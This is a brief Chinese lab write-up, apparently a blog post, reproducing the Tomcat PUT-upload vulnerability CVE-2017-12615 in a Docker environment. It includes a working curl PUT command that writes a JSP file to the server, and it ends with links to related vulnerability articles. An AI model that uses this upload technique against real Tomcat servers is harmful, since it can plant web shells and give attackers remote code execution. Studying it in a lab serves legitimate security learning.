Tomcat 远程代码执行漏洞 (CVE-2017-12615)
程序员文章站
2022-07-15 13:45:34
...
Tomcat 远程代码执行漏洞 (CVE-2017-12615)
0x00
首先还是通过docker搭建实验环境 ,实验环境需要docker来挂载,docker安装教程:https://blog.csdn.net/levones/article/details/80474994
下载docker镜像:
docker pull medicean/vulapps:t_tomcat_1
启动镜像:
docker run -d -p 8001:8080 medicean/vulapps:t_tomcat_1
启动镜像的命令中-p 8001:8080中冒号之前的端口号可自行指定
Docker成功挂载后访问ip:port的界面:
0x01 POC
这个漏洞的利用代码比较简单,是直接使用curl向网站根目录下写入一个jsp文件
curl -X PUT "http://your_server_ip:port/test.jsp/" -d '<%out.println("Test_hack");%>'
命令成功执行后直接访问测试靶机http://ip:port/test.jsp即可看到成功向靶机写入了一个jsp文件。
关于此漏洞更加详细的分析与利用:https://mp.weixin.qq.com/s/dgWT3Cgf1mQs-IYxeID_Mw
推荐阅读
-
网站漏洞修复之Discuz X3.4远程代码执行漏洞
-
ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
-
网站漏洞检测 squid反向代理存在远程代码执行漏洞
-
linux expect实现登陆远程主机并执行命令示例代码
-
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
-
java执行python代码(java远程调用python脚本讲解)
-
CVE-2019-1181 RDP协议漏洞导致执行远程代码 修复
-
java执行python代码(java远程调用python脚本讲解)
-
苹果CMS漏洞修复 对SQL远程代码注入及任意文件删除修补办法
-
Discuz! ML远程代码执行(CVE-2019-13956)